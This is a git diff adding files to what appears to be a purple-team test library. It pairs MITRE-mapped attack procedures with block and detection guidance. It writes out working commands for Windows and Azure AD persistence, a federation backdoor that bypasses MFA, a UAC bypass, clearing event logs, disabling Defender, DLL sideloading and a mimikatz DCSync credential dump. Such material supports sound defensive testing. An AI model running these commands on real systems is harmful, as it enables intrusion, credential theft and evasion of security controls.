+ +# Exfiltration + +## DLP Test - General use + +DLP Test (dlptest.com) is a web utility for testing if exfiltration of sensitive data is successful + +General usage notes for DLP Test + +### Notes + +- If sample sensitive data is needed, the site provides it in different types and formats +- The site supports HTTP, HTTPS, and FTP +- Do not upload actual sensitive data to the site + +## Exfiltration to cloud storage - General guidance + +Select and use a well-known cloud storage service + +### Prerequisites + +1. An account for the service +2. Tool client downloaded and installed + 1. Generic: https://rclone.org/downloads/ + 2. MEGA: https://mega.io/desktop + 3. Dropbox: https://www.dropbox.com/install + +### Notes + +- Where possible, use cloud storage service already in use in the environment + +# Lateral Movement + +# Persistence + +## Scheduled Task Persistence - via schtasks.exe + +Use built-in schtasks.exe to persist by creating a scheduled task + +### Guidance + +``` +CMD> schtasks /Create /SC DAILY /TN "{{ taskname }}" /TR "{{ command }}" /ST 09:00 +``` + +### Cleanup + +``` +CMD> schtasks /delete /tn "{{ taskname }}" /f +``` + +## Windows Service Persistence - via sc.exe + +Use built-in sc.exe to persist + +### Guidance + +``` +CMD> sc create {{ service_name }} binPath= "{{ command }}" +``` + +### Cleanup + +``` +CMD> sc delete {{ service_name }} +``` + +## New user persistence - via net.exe + +Use built-in net.exe to persist by creating a new local administrator user + +### Guidance + +``` +CMD> net user /add {{ username }} {{ password }} +CMD> net localgroup {{ group_name }} {{ username }} /add +``` + +### Cleanup + +``` +CMD> net user /delete {{ username }} +``` + +## Persistence in Azure AD - Register a New Device + +Register a new device in Azure AD + +### Prerequisites + +- Azure AD credentials +- AAD Internals PowerShell module (https://aadinternals.com/aadinternals/#installation) + - Install: `PS> install-module aadinternals -scope currentuser` + 
- Import: `PS> import-module aadinternals` + +### Guidance + +Authenticate to Azure AD and save the token + +``` +PS> Get-AADIntAccessTokenForAADJoin -SaveToCache +``` + +Register a device: + +``` +PS> Join-AADIntDeviceToAzureAD -DeviceName "{{ device_name }}" -DeviceType "{{ device_type }}" -OSVersion "{{ os_version }}" -JoinType Register +``` + + - This will save a `.pfx` certificate to the current working directory, which is needed for cleanup + - Note: The provided values do not need to refer to real characteristics + +### Cleanup + +Remove the device from Azure AD + +``` +PS> Remove-AADIntDeviceFromAzureAD -PfxFileName {{ pfx_certificate_file }} +``` + +## Azure AD Domain Federation - Backdoor via AADInternals + +Use AADInternals to create a backdoor federation domain for persisting access to an environment. + +### Prerequisites + +- Permissions to modify domain authentication settings + - and an access token for the user with these permissions, referred to as `$at` in example commands. To retrieve a token, use `$at=Get-AADIntAccessTokenForAADGraph -Credentials (get-credential)` and proceed through the prompts +- AADInternals installed + - `Install-Module AADInternals` +- A target verified domain in Azure AD + - To add a domain, Go to Azure AD -> custom domain names -> add -> set the provided DNS records for your domain -> wait for the verification to compelete +- A user with an immutable ID set + - To set an immutable ID for a user: `Set-AADIntUser -UserPrincipalName {{ upn_or_email }} -ImmutableId "{{ id }}" -AccessToken $at` where the `id` is an arbitrary unnique value + +### Guidance + +To set the backdoor + +``` +PS> ConvertTo-AADIntBackdoor -AccessToken $at -DomainName "{{ domain }}" +``` + +To use the backdoor. This works for any user in the tenant, regardless of their domain. 
+ +``` +Open-AADIntOffice365Portal -ImmutableID {{ id }} -UseBuiltInCertificate -ByPassMFA $true -Issuer {{ issuer }} +``` + +- `id` is the immutable ID of the target user +- `issuer` is the IssuerUri provided in the output of the previous command + +### Cleanup + +- Delete the domain + +### Notes + +- The domain must be verified for the backdoor to work + +### References + +- https://o365blog.com/post/aadbackdoor/ +- https://www.mandiant.com/resources/blog/detecting-microsoft-365-azure-active-directory-backdoors + diff --git a/rh-index-2024/rh-index-2024-v1.0-summary.csv b/rh-index-2024/rh-index-2024-v1.0-summary.csv new file mode 100644 index 0000000..846aebf --- /dev/null +++ b/rh-index-2024/rh-index-2024-v1.0-summary.csv 
@@ -0,0 +1,51 @@
+"Test Case","MITRE ID","Campaign","Description"
+"Prompt a user with multiple MFA requests","T1621","Initial Access","Using valid credentials for a user, prompt that user with multiple MFA requests in a short period of time in order to induce them to accept the prompt."
+"Attachment - ISO","T1566.001","Initial Access","Send phishing email to victim containing an ISO attachment. ISO files can be used to bypass mark-of-the-web restrictions."
+"Attachment - Zipped macro","T1566.001","Initial Access","Send a malicious macro-enabled Office document in a ZIP archive to a target user in an email."
+"Suspicious external employee login","T1078","Initial Access","Login to an external employee portal from an unexpected geolocation and with an unexpected user-agent to simulate a suspicious login attempt."
+"Suspicious service use","T1078","Initial Access","Interact with a service from an unexpected geolocation and with an unexpected user-agent to simulate suspicious use of the target service. This can occur, for example, when a user's token is stolen via a phishing attack then used by an attacker to assume their session and access a service."
+"Macro - Remote Template","T1221","Execution","Execute a malicious Office document on the endpoint that will load a macro stored in a remote template document"
+"Load known-abusable kernel driver","T1014","Defense Evasion","Load a legitimate and signed kernel driver that is vulnerable to exploitation. Refer to projects like KDU (https://github.com/hfiref0x/KDU/) for potential vulnerable drivers to use. Vulnerable, signed drivers provide a privileged (kernel) execution mechanism to attackers, allowing them to bypass security controls they couldn't otherwise bypass, such as by killing protected processes."
+"Sideload a DLL into a legitimate application","T1574.002","Defense Evasion","Rename an attacker-controlled DLL to the name of a DLL expected by a legitimate application, move that DLL to be adjacent to the application, then execute the application in order to trigger the loading of the DLL by the legitimate application."
+"DLL execution using Rundll32","T1218.011","Defense Evasion","Execute a malicious DLL's function directly using rundll32"
+"Bypass User Account Control (UAC) via fodhelper","T1548.002","Defense Evasion","Bypass user account control (UAC) to move to a high-integrity execution context via fodhelper.exe and a Registry modification"
+"Clear Windows Event Log entries","T1070.001","Defense Evasion","Clear the Windows Event Log entries using the builtin wevtutil.exe to remove any attack indicators in the logs."
+"Certutil decode Base64 encoded payload","T1140","Defense Evasion","Use certutil.exe to decode an encoded payload file"
+"Disable Windows Defender via PowerShell","T1562.001","Defense Evasion","Use PowerShell's Set-MpPreference to disable Windows Defender"
+"Modify identity policy in IdP","T1484","Defense Evasion","Modify an IdP policy to be more permissive for authentication. For example, disable an Azure AD conditional access policy's MFA requirement."
+"Domain Controller discovery via nltest","T1018","Discovery","Use nltest.exe to identify domain controllers in the domain"
+"Domain trust discovery via nltest","T1482","Discovery","Identify domain trust relationships using nltest.exe"
+"Internal network scan using Net Scan","T1046","Discovery","Perform an internal network scan to discover other hosts and services on the internal network using Network Scanner by SoftPerfect"
+"Enumerate domain groups and users using net","T1087.002","Discovery","Enumerate domain users and domain groups using the builtin net.exe"
+"BloodHound DC enumeration","T1087.002","Discovery","Use BloodHound/SharpHound to perform enumeration of domain resources against a domain controller"
+"Retrieve system information","T1082","Discovery","Retrieve information about the system using multiple builtin commands"
+"HTTP C2 over tcp/80","T1071.001","Command and Control","Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTP"
+"HTTPS C2 over tcp/443","T1071.001","Command and Control","Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTPS"
+"Access via remote assistance tool","T1219","Command and Control","Establish connection to system using a legitimate remote assistance application"
+"Remote tool download over HTTP","T1105","Command and Control","Download a tool from a public hosting location onto the victim system"
+"Screen Capture","T1113","Collection","Capture an image of the user's screen"
+"Keylogger","T1056.001","Collection","Log user keystrokes"
+"Extract domain user credentials via replication","T1003.006","Credential Access","Replicate a user's hash from a domain controller using replication APIs (DCSync)."
+"Extract Logonpasswords via Nanodump","T1003.001","Credential Access","Use nanodump to extract credentials from LSASS process memory"
+"Dump LSASS memory using builtin comsvcs.dll","T1003.001","Credential Access","Use rundll32.exe and comsvcs.dll to dump LSASS process memory to disk"
+"Dump LSASS memory using Sysinternals ProcDump","T1003.001","Credential Access","Use ProcDump from Sysinternals to dump LSASS process memory"
+"Extract browser cookies","T1555.003","Credential Access","Extract cookie information from the user's browser"
+"Volumetric Kerberoasting","T1558.003","Credential Access","Retrieve Kerberos TGS tickets from Active Directory for all users with service principal names (SPNs) set"
+"Enabled WDigest via Registry","T1112","Credential Access","Set the UseLogonCredential key in the WDigest hive to enable cleartext credential storage in-memory"
+"Encrypt a large amount of files","T1486","Impact","Encrypt a large amount of files on the endpoint to simulate ransomware"
+"Delete shadows with vssadmin.exe","T1490","Impact","Delete volume shadow copies on the host to inhibit file system recovery"
+"Modify group policy object","T1484.001","Impact","Modify a domain group policy object. This can be used for activities like persisting access to the environment, disabling security controls, and executing ransomware on domain systems."
+"Extract sensitive data over HTTP","T1048.003","Exfiltration","Extract data from the network over HTTP tcp/80 to an external host or IP."
+"Extract sensitive data over FTP","T1048.003","Exfiltration","Exfiltrate data from the internal network to an external system via FTP"
+"Extract data to cloud storage service","T1567.002","Exfiltration","Extract data from the internal network to a cloud storage service like MEGA, Google Drive, or Box"
+"Extract sensitive data over HTTP C2","T1041","Exfiltration","Extract data from the network via an HTTP C2 channel over tcp/80 to external host or IP"
+"Lateral Movement via WMI","T1021.003","Lateral Movement","Move to another system by using Windows Management Instrumentation (WMI) to spawn a process on that target system"
+"Lateral Movement via PsExec","T1021.002","Lateral Movement","Move to another system by creating a service remotely via Sysinternals PsExec"
+"Lateral Movement via RDP","T1021.001","Lateral Movement","Perform an interactive logons to a Windows system via RDP"
+"Remote .exe copy","T1570","Lateral Movement","Copy an .exe payload to a temp folder on the remote target"
+"Persist via new scheduled task","T1053.005","Persistence","Persist on a system by creating a new scheduled task"
+"Persist via new Windows service","T1543.003","Persistence","Persist on a system by creating a new service"
+"Persist via Registry Winlogon Shell","T1547.004","Persistence","Run a payload during user login by setting a Registry Winlogon key"
+"Persist via new local administrator","T1136.001","Persistence","Create a new local user then add them to the ""Administrators"" group using the builtin net.exe"
+"Register a new device in Azure AD","T1098.005","Persistence","Register a new device in Azure AD"
+"Configure a custom federated domain","T1484.002","Persistence","Convert a custom domain in the Azure Active Directory tenant into a federated domain. This can be used for persistent access into the tenant."
diff --git a/rh-index-2024/rh-index-2024-v1.0.yml b/rh-index-2024/rh-index-2024-v1.0.yml
new file mode 100644
index 0000000..620c606
--- /dev/null
+++ b/rh-index-2024/rh-index-2024-v1.0.yml 
@@ -0,0 +1,1020 @@
+Initial Access:
+- name: Prompt a user with multiple MFA requests
+ description: Using valid credentials for a user, prompt that user with multiple MFA requests in a short period of time in order to induce them to accept the prompt.
+ platforms:
+ guidance:
+ block:
+ - Prevent sign-ins from users with anomalous login characteristics, such as an unknown geolocation or device fingerprint
+ detect:
+ - Baseline MFA requests for users using authentication logs then generate alerts for instances where the amount of MFA requests for a user significantly exceeds the baseline within a short time period (e.g. <1 hour).
+ controls:
+ - IdP
+ metadata:
+ id: ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7
+ tid: T1621
+ tactic: TA0006
+ x_vectr_id: ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7
+ isv: 1
+- name: Attachment - ISO
+ description: Send phishing email to victim containing an ISO attachment. ISO files can be used to bypass mark-of-the-web restrictions.
+ platforms:
+ guidance:
+ - PS> Send-MailMessage -SmtpServer {{ maildomain }} -UseSSL -BodyAsHTML -Subject {{ subject }} -Body {{ body }} -To {{ target }} -From {{ noreply@maildomain }} -Attachments {{ attachment }}
+ block:
+ - Malicious email blocked/quarantined or link inside email rewritten/stripped by email gateway
+ detect:
+ - Malicious email alerted on by email gateway
+ controls:
+ - Mail Gateway
+ metadata:
+ id: ccf6d4a6-879e-4a7c-a2ae-6273437fc658
+ tid: T1566.001
+ tactic: TA0001
+ x_vectr_id: ccf6d4a6-879e-4a7c-a2ae-6273437fc658
+ isv: 1
+- name: Attachment - Zipped macro
+ description: Send a malicious macro-enabled Office document in a ZIP archive to a target user in an email.
+ platforms:
+ guidance:
+ - PS> Send-MailMessage -SmtpServer {{ maildomain }} -UseSSL -BodyAsHTML -Subject {{ subject }} -Body {{ body }} -To {{ target }} -From {{ noreply@maildomain }} -Attachments {{ attachment }}
+ block:
+ - Malicious email blocked/quarantined or attachment inside email stripped by email gateway
+ detect:
+ - Malicious email alerted on by email gateway
+ controls:
+ - Mail Gateway
+ metadata:
+ id: 97f1da56-79a3-4181-a491-8de9f93b05af
+ tid: T1566.001
+ tactic: TA0001
+ x_vectr_id: 97f1da56-79a3-4181-a491-8de9f93b05af
+ isv: 1
+- name: Suspicious external employee login
+ description: Login to an external employee portal from an unexpected geolocation and with an unexpected user-agent to simulate a suspicious login attempt.
+ platforms:
+ guidance:
+ block:
+ - Suspicious logins originating from select geolocations are blocked
+ detect:
+ - Baseline login events for users using authentication logs then generate alerts for instances where the logins occur from comparatively anomalous geolocations
+ controls:
+ - SIEM
+ - IdP
+ metadata:
+ id: 609515fe-24e0-4bc2-a069-a3d815e68ec2
+ tid: T1078
+ tactic: TA0001
+ x_vectr_id: 609515fe-24e0-4bc2-a069-a3d815e68ec2
+ isv: 1
+- name: Suspicious service use
+ description: Interact with a service from an unexpected geolocation and with an unexpected user-agent to simulate suspicious use of the target service. This can occur, for example, when a user's token is stolen via a phishing attack then used by an attacker to assume their session and access a service.
+ platforms:
+ guidance:
+ block:
+ - ''
+ detect:
+ - Baseline application use for users using application logs then generate alerts for instances where the usage occurs from comparatively anomalous geolocations
+ controls:
+ - SIEM
+ metadata:
+ id: 1f9d5363-ddf4-41c3-8bc3-f80595219206
+ tid: T1078
+ tactic: TA0001
+ x_vectr_id: 1f9d5363-ddf4-41c3-8bc3-f80595219206
+ isv: 1
+Execution:
+- name: Macro - Remote Template
+ description: Execute a malicious Office document on the endpoint that will load a macro stored in a remote template document
+ platforms:
+ - windows
+ guidance:
+ block:
+ - Macro execution is blocked by GPO policy
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ - Payload on disk deleted/quarantined by endpoint security tool
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+ - Payload on disk triggers an alert with endpoint security tool
+ controls:
+ - Endpoint Protection
+ - Hardening
+ - SIEM
+ metadata:
+ id: a7134d71-dc49-41a8-a309-ec520c96a089
+ tid: T1221
+ tactic: TA0005
+ x_vectr_id: a7134d71-dc49-41a8-a309-ec520c96a089
+ isv: 1
+Defense Evasion:
+- name: Load known-abusable kernel driver
+ description: Load a legitimate and signed kernel driver that is vulnerable to exploitation. Refer to projects like KDU (https://github.com/hfiref0x/KDU/) for potential vulnerable drivers to use. Vulnerable, signed drivers provide a privileged (kernel) execution mechanism to attackers, allowing them to bypass security controls they couldn't otherwise bypass, such as by killing protected processes.
+ platforms:
+ - windows
+ guidance:
+ - "(example) cmd> \nsc.exe create {{ name }} type= kernel start= demand error= normal binpath= c:\\windows\\System32\\Drivers\\{{ sys_file }} displayname= {{ name }}\nsc.exe start {{ name }}\n"
+ block:
+ - Use built-in Windows security features like HVCI and WDAC to block loading of drivers based on hash and/or signature characteristics.
+ - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules
+ - https://www.loldrivers.io/
+ - Anomalous driver load blocked by endpoint security tool
+ detect:
+ - Anomalous driver load detected by endpoint security tool or in the SIEM via telemetry data, such as Sysmon ID 6
+ controls:
+ - Hardening
+ - Endpoint Protection
+ metadata:
+ id: 327db68c-178b-4e3c-8f2d-12d91bc49fe0
+ tid: T1014
+ tactic: TA0005
+ x_vectr_id: 327db68c-178b-4e3c-8f2d-12d91bc49fe0
+ isv: 1
+- name: Sideload a DLL into a legitimate application
+ description: Rename an attacker-controlled DLL to the name of a DLL expected by a legitimate application, move that DLL to be adjacent to the application, then execute the application in order to trigger the loading of the DLL by the legitimate application.
+ platforms:
+ - windows
+ guidance:
+ - "CMD>\ncopy {{ application }} .\nmove {{ dll }} {{ expected_dll }}\n{{ application }}"
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool
+ - Using image load telemetry, alert on DLLs stored on-disk at unexpected locations (e.g. a DLL expected to be in System32 being loaded from a temp folder)
+ controls:
+ - Endpoint Protection
+ - SIEM
+ metadata:
+ id: 2496e250-5757-482f-9661-daea872395ae
+ tid: T1574.002
+ tactic: TA0005
+ x_vectr_id: 2496e250-5757-482f-9661-daea872395ae
+ isv: 1
+- name: DLL execution using Rundll32
+ description: Execute a malicious DLL's function directly using rundll32
+ platforms:
+ - windows
+ guidance:
+ - cmd> rundll32 {{ dll }},{{ export }} [{{ args }}]
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ - Payload on disk deleted/quarantined by endpoint security tool
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool
+ controls:
+ - Endpoint Protection
+ - SIEM
+ metadata:
+ id: 940be4b6-6081-4808-ab64-aceadfeb3792
+ tid: T1218.011
+ tactic: TA0005
+ x_vectr_id: 940be4b6-6081-4808-ab64-aceadfeb3792
+ isv: 1
+- name: Bypass User Account Control (UAC) via fodhelper
+ description: Bypass user account control (UAC) to move to a high-integrity execution context via fodhelper.exe and a Registry modification
+ platforms:
+ - windows
+ guidance:
+ - cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /f
+ - cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "C:\windows\system32\cmd.exe" /f
+ - cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /d "" /f
+ - cmd> c:\windows\system32\fodhelper.exe
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+ - Suspicious Windows Registry access/modifications detected in the SIEM using telemetry (e.g. Windows Advanced Audit events, endpoint security tool logs)
+ controls:
+ - SIEM
+ - Endpoint Protection
+ metadata:
+ id: 8c06191e-8c03-4b97-8c18-e28cde39fda5
+ tid: T1548.002
+ tactic: TA0004
+ x_references:
+ - https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/
+ x_vectr_id: 8c06191e-8c03-4b97-8c18-e28cde39fda5
+ isv: 1
+- name: Clear Windows Event Log entries
+ description: Clear the Windows Event Log entries using the builtin wevtutil.exe to remove any attack indicators in the logs.
+ platforms:
+ - windows
+ guidance:
+ - CMD> wevtutil clear-log Security
+ - CMD> wevtutil clear-log Application
+ - CMD> wevtutil clear-log System
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+ - Suspicious Windows Event Log deletion is detected in the SIEM using Event Log events (Event ID 1102)
+ controls:
+ - Endpoint Protection
+ - SIEM
+ metadata:
+ id: 16ed92a3-b979-464b-bc79-fadb43e3c6a1
+ tid: T1070.001
+ tactic: TA0005
+ x_vectr_id: 16ed92a3-b979-464b-bc79-fadb43e3c6a1
+ isv: 1
+- name: Certutil decode Base64 encoded payload
+ description: Use certutil.exe to decode an encoded payload file
+ platforms:
+ - windows
+ guidance:
+ - cmd> certutil -decode {{ infile_name }} {{ outfile_name }}
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool
+ - Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+ controls:
+ - Endpoint Protection
+ - SIEM
+ metadata:
+ id: 9dbfedcf-893f-4086-b428-2f3bc73c96a5
+ tid: T1140
+ tactic: TA0005
+ x_vectr_id: 9dbfedcf-893f-4086-b428-2f3bc73c96a5
+ isv: 1
+- name: Disable Windows Defender via PowerShell
+ description: Use PowerShell's Set-MpPreference to disable Windows Defender
+ platforms:
+ - windows
+ guidance:
+ - PS> Set-MpPreference -DisableBehaviorMonitoring $true
+ - PS> Set-MpPreference -DisableRealtimeMonitoring $true
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool
+ - "Changes to Defender's running state are detected using Defender Event Log events (e.g. 5001 for being disabled, 5004 and 5007 for being changed; full list: https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus)"
+ controls:
+ - Endpoint Protection
+ metadata:
+ id: cb3ea139-979c-438a-9cf7-611b985f4d61
+ tid: T1562.001
+ tactic: TA0005
+ x_vectr_id: cb3ea139-979c-438a-9cf7-611b985f4d61
+ isv: 1
+- name: Modify identity policy in IdP
+ description: Modify an IdP policy to be more permissive for authentication. For example, disable an Azure AD conditional access policy's MFA requirement.
+ platforms:
+ guidance:
+ block:
+ - ''
+ detect:
+ - Monitor for policy modifications from IdP control plane telemetry and look for anomalous changes, such as those performed by unexpected principals or changes occuring outside of expected business processes
+ controls:
+ - SIEM
+ metadata:
+ id: cbd9070f-03fa-455f-af46-99e8d41146ac
+ tid: T1484
+ tactic: TA0003
+ x_vectr_id: cbd9070f-03fa-455f-af46-99e8d41146ac
+ isv: 1
+Discovery:
+- name: Domain Controller discovery via nltest
+ description: Use nltest.exe to identify domain controllers in the domain
+ platforms:
+ - windows
+ guidance:
+ - cmd> nltest.exe /dclist:{{ domain }}
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool
+ - Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+ controls:
+ - Endpoint Protection
+ - SIEM
+ metadata:
+ id: bc85f11b-e481-4afb-a5f5-db26e5c07433
+ tid: T1018
+ tactic: TA0007
+ x_vectr_id: bc85f11b-e481-4afb-a5f5-db26e5c07433
+ isv: 1
+- name: Domain trust discovery via nltest
+ description: Identify domain trust relationships using nltest.exe
+ platforms:
+ - windows
+ guidance:
+ - cmd> nltest.exe /domain_trusts /all_trusts
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool
+ - Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+ controls:
+ - Endpoint Protection
+ - SIEM
+ metadata:
+ id: 4266c26e-0470-4b97-8dc3-1d24fe35f586
+ tid: T1482
+ tactic: TA0007
+ x_vectr_id: 4266c26e-0470-4b97-8dc3-1d24fe35f586
+ isv: 1
+- name: Internal network scan using Net Scan
+ description: Perform an internal network scan to discover other hosts and services on the internal network using Network Scanner by SoftPerfect
+ platforms:
+ - windows
+ guidance:
+ - cmd> {{ netscan_binary }}
+ block:
+ - Network security controls block source generating a large volume of connection requests
+ - Block the installation and use of unapproved third-party utilities via application control software
+ detect:
+ - Network security controls or the SIEM detect a source generating a large volume of connection requests by network traffic logs like switch logs and flow logs
+ controls:
+ - ID/PS
+ - Firewall
+ - SIEM
+ - Application Control
+ metadata:
+ id: 3f120c23-78c0-462f-808f-38ef4f607233
+ tid: T1046
+ tactic: TA0007
+ x_tools:
+ - https://www.softperfect.com/products/networkscanner/
+ x_vectr_id: 3f120c23-78c0-462f-808f-38ef4f607233
+ isv: 1
+- name: Enumerate domain groups and users using net
+ description: Enumerate domain users and domain groups using the builtin net.exe
+ platforms:
+ - windows
+ guidance:
+ - cmd> net user /domain
+ - cmd> net group /domain
+ - cmd> net group "Domain Admins" /domain
+ - cmd> net group "Domain Computers" /domain
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool
+ - Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+ controls:
+ - Endpoint Protection
+ - SIEM
+ metadata:
+ id: 7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2
+ tid: T1087.002
+ tactic: TA0007
+ x_vectr_id: 7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2
+ isv: 1
+- name: BloodHound DC enumeration
+ description: Use BloodHound/SharpHound to perform enumeration of domain resources against a domain controller
+ platforms:
+ guidance:
+ - cmd> SharpHound.exe -c DcOnly
+ block:
+ - ''
+ detect:
+ - Windows enumeration activities detected from large amount of network traffic (SMB, ARP, SAMR, etc) via UEBA-like or network monitoring tools
+ - Enable object logging for directory services via Group Policy Advanced Audit then configure a SACL on Active Directory objects. Trigger an alert when multiple (high-value) objects are accessed by a single source in a short period using object access logs for the directory service objects (Evevnt ID 4656, 4663)
+ - https://blog.blacklanternsecurity.com/p/detecting-ldap-recoannaissance
+ controls:
+ - SIEM
+ - Identity Threat Protection
+ metadata:
+ id: 672f8861-c914-4f58-b861-5107ce19f61c
+ tid: T1087.002
+ tactic: TA0007
+ x_tools:
+ - https://github.com/BloodHoundAD/SharpHound
+ x_vectr_id: 672f8861-c914-4f58-b861-5107ce19f61c
+ isv: 1
+- name: Retrieve system information
+ description: Retrieve information about the system using multiple builtin commands
+ platforms:
+ - windows
+ guidance:
+ - CMD> systeminfo ipconfig tasklist sc query wmic product get
+ block:
+ - ''
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+ controls:
+ - Endpoint Protection
+ - SIEM
+ metadata:
+ id: 9064e91a-be78-48a5-9112-28d5701d6d51
+ tid: T1082
+ tactic: TA0007
+ x_vectr_id: 9064e91a-be78-48a5-9112-28d5701d6d51
+ isv: 1
+Command and Control:
+- name: HTTP C2 over tcp/80
+ description: Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTP
+ platforms:
+ guidance:
+ block:
+ - C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool
+ detect:
+ - C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool
+ controls:
+ - Firewall
+ - ID/PS
+ - Web Gateway
+ metadata:
+ id: 38064494-0d58-4f48-bce8-b5b7ea7db3da
+ tid: T1071.001
+ tactic: TA0011
+ x_vectr_id: 38064494-0d58-4f48-bce8-b5b7ea7db3da
+ isv: 1
+- name: HTTPS C2 over tcp/443
+ description: Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTPS
+ platforms:
+ guidance:
+ block:
+ - C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool
+ detect:
+ - C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool
+ controls:
+ - Firewall
+ - ID/PS
+ - Web Gateway
+ metadata:
+ id: 3ed2f449-744b-48c3-80d2-854386e446a0
+ tid: T1071.001
+ tactic: TA0011
+ x_vectr_id: 3ed2f449-744b-48c3-80d2-854386e446a0
+ isv: 1
+- name: Access via remote assistance tool
+ description: Establish connection to system using a legitimate remote assistance application
+ platforms:
+ guidance:
+ block:
+ - Block the installation and use of unapproved third-party utilities via application control software
+ - Connections to known remote access service domains/IPs are blocked
+ - Remote access connection attempts originating from users outside of the tenant are blocked
+ detect:
+ - Connections to known remote access service domains/IPs are detected
+ controls:
+ - Application Control
+ - ID/PS
+ - Firewall
+ metadata:
+ id: 10f6c44e-b862-4553-bc55-68f6d941bcfb
+ tid: T1219
+ tactic: TA0011
+ x_vectr_id: 10f6c44e-b862-4553-bc55-68f6d941bcfb
+ isv: 1
+- name: Remote tool download over HTTP
+ description: Download a tool from a public hosting location onto the victim system
+ platforms:
+ guidance:
+ block:
+ - Signatures for known-malicious tools/traffic are blocked by network security controls such as an ID/PS
+ detect:
+ - Signatures for known-malicious tools/traffic are detected by network security controls such as an ID/PS
+ controls:
+ - Firewall
+ - ID/PS
+ - Web Gateway
+ metadata:
+ id: 9755cd8b-5212-4331-8c6e-afb27404a4b9
+ tid: T1105
+ tactic: TA0011
+ x_vectr_id: 9755cd8b-5212-4331-8c6e-afb27404a4b9
+ isv: 1
+Collection:
+- name: Screen Capture
+ description: Capture an image of the user's screen
+ platforms:
+ guidance:
+ - "implant> {{ screenshot_command }}\nOR \nshell> {{ screenshot_tool }}"
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool
+ controls:
+ - Endpoint Protection
+ metadata:
+ id: 804512cc-4acf-4be3-a577-ce02ea723fab
+ tid: T1113
+ tactic: TA0009
+ x_tools:
+ - https://github.com/2XXE-SRA/payload_resources/blob/master/csharp/screenshot.cs
+ x_vectr_id: 804512cc-4acf-4be3-a577-ce02ea723fab
+ isv: 1
+- name: Keylogger
+ description: Log user keystrokes
+ platforms:
+ - windows
+ guidance:
+ - "implant> {{ keylog_command }}\nOR \nshell> {{ keylog_tool }}"
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool
+ controls:
+ - Endpoint Protection
+ metadata:
+ id: be524cb1-12e6-4708-ad57-faf91dfad9de
+ tid: T1056.001
+ tactic: TA0009
+ x_tools:
+ - https://github.com/2XXE-SRA/payload_resources/blob/master/csharp/keylog.cs
+ x_vectr_id: be524cb1-12e6-4708-ad57-faf91dfad9de
+ isv: 1
+Credential Access:
+- name: Extract domain user credentials via replication
+ description: Replicate a user's hash from a domain controller using replication APIs (DCSync).
+ platforms:
+ - windows
+ guidance:
+ - (from workstation) mimikatz> lsadump::dcsync /domain:{{ domain }} /user:{{ user }}
+ block:
+ - ''
+ detect:
+ - Enable object logging for directory services via Group Policy Advanced Audit then alert when non-domin controller sources replicate directory objects. Specifically, look for Event ID 4662 events where the action performed was related to replicating object changes (e.g. either/both of "Replicating Directory Changes all" and "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"/"{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}")
+ - https://blog.blacklanternsecurity.com/p/detecting-dcsync
+ controls:
+ - SIEM
+ - Identity Threat Protection
+ metadata:
+ id: d6dd145b-c7ae-4f79-bc07-179a012a7a07
+ tid: T1003.006
+ tactic: TA0006
+ x_vectr_id: d6dd145b-c7ae-4f79-bc07-179a012a7a07
+ isv: 1
